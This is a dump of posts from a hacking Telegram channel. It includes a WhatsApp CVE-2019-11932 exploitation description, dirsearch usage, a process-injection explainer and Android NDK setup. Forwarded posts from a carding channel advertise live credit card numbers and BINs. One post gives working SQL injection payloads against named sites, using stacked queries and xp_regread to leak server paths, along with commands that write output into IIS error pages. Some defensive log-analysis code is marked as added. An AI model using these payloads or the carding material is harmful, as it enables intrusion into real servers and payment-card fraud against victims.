UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
Forwarded from TARJETAS PRO UNDER CARDING
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 LiveCCN ✅ :

@UndercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 All you need to know about the WhatsApp UAF vulnerability analysis (CVE-2019-11932)
t.me/UndercodeTesting

🦑 Let's start:

1) The attacker sends GIF files to users through any channel. One of them can be WhatsApp, as a document (for example, press the "Gallery" button and select "Document" to send the corrupted GIF).

If the attacker is in the user's contact list (i.e. a friend), the corrupted GIF is downloaded automatically without any user interaction.

2) The user wants to send a media file to any of their WhatsApp friends, so the user presses the "Gallery" button and opens the WhatsApp Gallery to select the media file to send. Note that the user does not have to send anything: just opening the WhatsApp Gallery triggers the bug. No additional touch is required after pressing WhatsApp Gallery.

3) Since WhatsApp displays a preview of each media file (including the received GIF file), it triggers the double-free bug and our RCE exploit.
This vulnerability affects WhatsApp versions prior to 2.19.244, and Android 8.1 and 9.0 versions.

written by undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from TARJETAS PRO UNDER CARDING
🦑 BIN Netflix


▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best web path scanner:
t.me/UndercodeTesting

🦑 INSTALLATION & RUN:

1) git clone https://github.com/maurosoria/dirsearch.git
2) cd dirsearch
3) python3 dirsearch.py -u <URL> -e <EXTENSION>

🦑 FEATURES:

Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Heuristically detects invalid web pages
Recursive brute forcing
HTTP proxy support
User agent randomization
Batch processing
Request delaying
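
How this kind of scan shows up on the server side, as an added example (not part of the original post and not dirsearch code): a small detector over web access-log lines that flags clients requesting many distinct paths that mostly miss. It keys on the client address and on the miss ratio because the feature list above includes user agent randomization and request delaying; the thresholds, addresses and log lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Combined-log-format line: ip, request line, status, referer, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def find_path_scanners(lines, min_paths=6, min_miss_ratio=0.8):
    """Return {client_ip: summary} for clients whose requests look like path brute forcing."""
    stats = defaultdict(lambda: {"paths": set(), "agents": set(), "misses": 0, "total": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        s = stats[m["ip"]]
        s["total"] += 1
        s["paths"].add(m["path"].split("?", 1)[0])
        s["agents"].add(m["ua"])  # kept for context only: the scanner can randomize it
        if m["status"] in ("403", "404"):
            s["misses"] += 1
    flagged = {}
    for ip, s in stats.items():
        ratio = s["misses"] / s["total"]
        # Ratio-based rather than rate-based, so request delaying does not hide the client.
        if len(s["paths"]) >= min_paths and ratio >= min_miss_ratio:
            flagged[ip] = {"distinct_paths": len(s["paths"]),
                           "miss_ratio": round(ratio, 2),
                           "user_agents": len(s["agents"])}
    return flagged

def make_line(ip, path, status, ua):
    """Build one constructed log line (sample data, not real traffic)."""
    return f'{ip} - - [10/Mar/2020:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'

# Constructed sample: one client guessing .php paths with rotating user agents, one normal visitor.
GUESSES = ["admin", "backup", "config", "login", "test", "shell", "db", "old"]
SAMPLE = [make_line("203.0.113.7", f"/{n}.php", 200 if n == "login" else 404, f"UA-{i % 3}")
          for i, n in enumerate(GUESSES)]
SAMPLE += [make_line("198.51.100.20", p, 200, "Mozilla/5.0") for p in ["/", "/index.php", "/css/site.css"]]
SAMPLE.append(make_line("198.51.100.20", "/favicon.ico", 404, "Mozilla/5.0"))

if __name__ == "__main__":
    print(find_path_scanners(SAMPLE))
```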

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WHAT IS PROCESS INJECTION?

Process injection is a technique in which malicious code is injected into another running, valid process, so that the process executes the code while avoiding suspicion and evading detection. This allows the malicious code to run using the process's memory, resources and elevated privileges. In addition, because the code runs under a valid process, it can potentially evade security solutions such as host-based firewalls, antivirus, EDRs and so on.

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Nowadays, attackers and malware use various methods to perform process injection.
> The following describes some of these techniques (process injection)
t.me/UndercodeTesting


1) Classic DLL injection: In this method, the malware creates a DLL on the disk and places its path string in the virtual address space of the target process, thus ensuring the process executes it. The DLL then inherits the same access to all objects and resources as the target process. In addition, since the malware creates a DLL on the disk, it is susceptible to being detected by security products.

2) Process hollowing: In this method, the malware spawns a new instance of the target process by overwriting the memory space of the target process and replacing it with the malicious code. This technique is known as process hollowing and makes the malware stealthier than classic DLL injection, as it looks like a valid process.

3) Portable executable ("PE") injection: In this method, the malware copies its malicious code into the virtual address space of the target process and causes it to execute via shellcode or the CreateRemoteThread function. The malware allocates memory in the target process and loads its malicious code into it instead of placing its path string there, as in the case of classic DLL injection. This means the target process is running two (2) different pieces of code (the legitimate process and the malware), and the technique relies on Windows APIs.
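
How a defender can tell the three techniques above apart in endpoint telemetry, as an added example (not part of the original post): a triage function over events that use Sysmon-style field names, where EventID 8 is CreateRemoteThread and EventID 25 is ProcessTampering. The events, paths and the simple heuristics are constructed assumptions; real deployments need allowlists for legitimate software that creates remote threads.

```python
# Constructed events with Sysmon-style field names (assumed telemetry source).
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\kernel32.dll", "StartFunction": "LoadLibraryW"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartModule": "-", "StartFunction": "-"},
    {"EventID": 25, "Image": r"C:\Windows\System32\svchost.exe", "Type": "Image is replaced"},
    {"EventID": 8, "SourceImage": r"C:\Tools\debugger.exe",
     "TargetImage": r"C:\Apps\service.exe",
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "DbgUiRemoteBreakin"},
]

def classify(event):
    """Map one event to the injection technique it most likely indicates, or None."""
    event_id = event.get("EventID")
    # The mapped image of a running process no longer matches the file on disk.
    if event_id == 25 and event.get("Type") == "Image is replaced":
        return "process hollowing"
    if event_id == 8:
        # Remote thread that starts at the DLL loader: a DLL path was handed to the target.
        if event.get("StartFunction", "").lower().startswith("loadlibrary"):
            return "classic DLL injection"
        # Remote thread that starts in memory not backed by any module on disk.
        if event.get("StartModule", "") in ("", "-"):
            return "PE injection"
    return None

def triage(events):
    """Return (technique, source image, affected image) for every suspicious event."""
    findings = []
    for event in events:
        label = classify(event)
        if label:
            affected = event.get("TargetImage") or event.get("Image")
            findings.append((label, event.get("SourceImage", "-"), affected))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```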

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ANDROID PENTESTING GUIDE:

> Installed SDKs are on the following paths:

1) Windows:

C:\Users\<username>\AppData\Local\Android\sdk

MacOS:

/Users/<username>/Library/Android/sdk

Note: On Linux, you need to choose an SDK directory. /opt, /srv, and /usr/local are common choices.

2) Setting up the Android NDK:

> The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains directory of the NDK, which contains one subdirectory for each architecture.

🦑 Architecture    Toolchain name

ARM-based          arm-linux-androideabi-<gcc-version>
x86-based          x86-<gcc-version>
MIPS-based         mipsel-linux-android-<gcc-version>
ARM64-based        aarch64-linux-android-<gcc-version>
X86-64-based       x86_64-<gcc-version>
MIPS64-based       mips64el-linux-android-<gcc-version>

Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Possible sysroots for each Android API level are in $NDK/platforms/. Each API level directory contains subdirectories for the various CPUs and architectures.

3) One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchain, a "temporary" toolchain that incorporates the required settings.

4) To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:

$ ./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain

5) This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain. For convenience, you can export an environment variable that points to your toolchain directory (we'll be using this in the examples). Run the following command or add it to your .bash_profile or other startup script:

$ export TOOLCHAIN=/tmp/android-7-toolchain

🦑 Testing Device
For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on an emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices.
Forwarded from TARJETAS PRO UNDER CARDING
🦑 BIN Shopping Multifunctional 💳

@UndercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 For advanced hackers - commands to view the WEB absolute path directory, by undercode:
t.me/UndercodeTesting

1) Command to view the website installation directory:

cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root > c:\test1.txt (try 2 instead of 1, 3, 4, 5)
type c:\test1.txt
del c:\test1.txt

Under NBSI the result of the operation can be displayed directly, so there is no need to export it to a file.

2) Pick the name of any picture on the website, for example 123.jpg

Then write it into the batch program 123.bat:

d:
dir 123.jpg /s > c:\123.txt
e:
dir 123.jpg /s >> c:\123.txt
f:
dir 123.jpg /s >> c:\123.txt

After execution, run type c:\123.txt

This lets you work out the path of the website.

3) The SQL server and the website server are on the same server. Okay, you can execute commands, right?

Redirect the output of the command to

%windir%\help\iishelp\common\404b.htm or 500.asp

Note: back up the two files before writing the output.

Such as:

dir c:\ > %windir%\help\iishelp\common\404b.htm

Then simply enter a file to access: http://target ip/2.asp

4) For win2000 systems:

Use xp_regread to read HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots to get the WEB path.

2003 system: no method of use found

Such as:

(1) Create a new table cyfd (field is gyfd): http://www.7k7k5.com/NewsShow.aspx?id=4844;create table [dbo].[Cyfd] ([gyfd] [char](255))-

(2) Write the web path: http://www.7k7k5.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into cyfd (gyfd) values (@result);-

(3) Then force a type mismatch so that an error is displayed: http://www.hack68.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd>1)

Source: .Net SqlClient Data Provider

Description: A grammatical error occurred when converting the varchar value 'Y:\Web\Yantai Talent Hotline Background Management System, 201' to a column of data type int.

TargetSite: Boolean Read()

Hahaha.. The path is exposed..

(4) Next delete the table: http://www.7k7k5.com/NewsShow.aspx?id=4844;drop table cyfd;-

5) Use the regedit command to export the registry and save the exported results to the %windir%\help\iishelp\common\404b.htm or 500.asp page

regedit command description:

Regedit /L:system /R:user /E filename.reg Regpath

Parameter meaning:

/L:system specifies the path where the System.dat file is located.

/R:user specifies the path where the User.dat file is located.

/E: This parameter specifies that the Registry Editor is to export the registry. Leave a space after this parameter and enter the file name of the exported registry.

Regpath: Specifies which registry branch to export. If not specified, all registry branches are exported.

Among these parameters, "/L:system" and "/R:user" are optional. If these two parameters are not used, the Registry Editor assumes the "system.dat" and "user.dat" files in the WINDOWS directory. If you boot from a floppy disk and enter DOS, you must use the "/L" and "/R" parameters to specify the specific paths of the "system.dat" and "user.dat" files, otherwise the Registry Editor will not be able to find them. For example, if you enter DOS through the boot disk, the command to back up the registry is "Regedit /L:C:\windows\ /R:C:\windows\ /e regedit.reg", which backs up the entire registry to the WINDOWS directory under the file name "regedit.reg". If you enter the "regedit /E D:\regedit.reg" command, the entire registry is backed up to the root directory of the D drive (the "/L" and "/R" parameters are omitted). The file name is "Regedit.reg".

regedit /s c:\adam.reg : imports the c:\adam.reg file into the registry

regedit /e c:\web.reg : backs up all registry content to c:\web.reg
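
On the defending side, the stacked-query requests from step 4 are visible in the web server's request log. An added example (not part of the original post) that scans W3C-format IIS log lines for them after URL decoding; the field list, addresses, indicator names and log lines are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the requests shown in step 4: a second SQL statement after ';',
# an extended stored procedure (xp_...), and a registry hive name in the query string.
INDICATORS = {
    "stacked_statement": re.compile(r";\s*(create|drop|declare|exec|insert)\b", re.I),
    "extended_proc": re.compile(r"\bxp_\w+", re.I),
    "registry_path": re.compile(r"hkey_local_machine", re.I),
}

# Constructed sample log (not real traffic); the #Fields line defines the column order.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2020-03-10 10:00:00 GET /NewsShow.aspx id=4844 198.51.100.20 200
2020-03-10 10:00:05 GET /NewsShow.aspx id=4844;create+table+cyfd+(gyfd+char(255))-- 203.0.113.7 200
2020-03-10 10:00:09 GET /NewsShow.aspx id=4844;declare+@r+varchar(255)+exec+master.dbo.xp_regread+'HKEY_LOCAL_MACHINE' 203.0.113.7 200
2020-03-10 10:00:20 GET /NewsShow.aspx id=4844;drop%20table%20cyfd;-- 203.0.113.7 200
""".splitlines()

def scan_iis_log(lines):
    """Return (client ip, uri stem, matched indicator names) for suspicious requests."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not fields:
            continue  # other directives, or data before any #Fields header
        row = dict(zip(fields, line.split()))
        # Decode %xx and '+' first so encoded payloads match the same patterns.
        query = unquote_plus(row.get("cs-uri-query", "-"))
        matched = sorted(name for name, rx in INDICATORS.items() if rx.search(query))
        if matched:
            hits.append((row.get("c-ip"), row.get("cs-uri-stem"), matched))
    return hits

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```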